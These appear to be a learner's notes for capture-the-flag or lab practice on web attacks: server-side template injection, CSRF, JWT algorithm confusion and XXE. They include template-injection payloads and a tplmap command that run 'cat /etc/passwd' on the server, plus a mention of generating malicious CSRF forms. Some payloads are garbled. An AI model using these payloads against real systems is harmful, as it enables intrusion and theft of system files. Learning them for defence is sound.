SSTI - Templet engine that allows devs to use static HTML pages with dynamic elements. -server side template injection: a user is able to pass in a parameter that can control the template engine that is running on the server -different template engines have different injection payloads -{{2+2}}
List of Template injections https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#basic-injection
{{config.class.init.globals[‘os’].popen(cat /etc/passwd).read()}} {{ ”.class.mro[2].subclasses()40().read()}} {{ ”.class.mro[2].subclasses()40.read() }}
Automatic Exploitation of SSTI (server side template injection) -use tool: Tplmap -install using python
get: tplmap -u
tplmap -u http://10.10.10.10:5000/ -d ‘noot’ —os-cmd “cat /etc/passwd”
Server side template injection challenge
{{config.class.init.globals[‘os’].popen(‘cat /flag’).read()}}
CSRF - Cross site request forgery. -the victim makes the request not the site -site sees a normal request from a normal user -could lead to user’s account being fully compromised through the use of a password reset -attacker gains personal information about a user
Manual and Automatic Exploitation
Manual - change user request in Burp
Automatic - automated scanner: xsrfprobe
pip3 install xsrfprobe
xsrfprobe -u
—malicious: generate a malicious CSRF form which can be used in real-world exploits
JWT
Json Web Token - secure method of authentication -“header.payload.secret” - secret is only know to the server -used to make sure that data wasn’t changed along the way -base64 encoded -changing the secret can change the data -header looks like {“type”: “JWT”, “alg”: “RS256”} -alg field: RS256 → private RSA key only available to the server -chanign the field to HS256 → server’s public key (can be accessed)
XXE
-applications using XML document to do an action -improper hangling of XML can lead to XML External Entity Injection (XXE) -add an entity that has value of /etc/passwd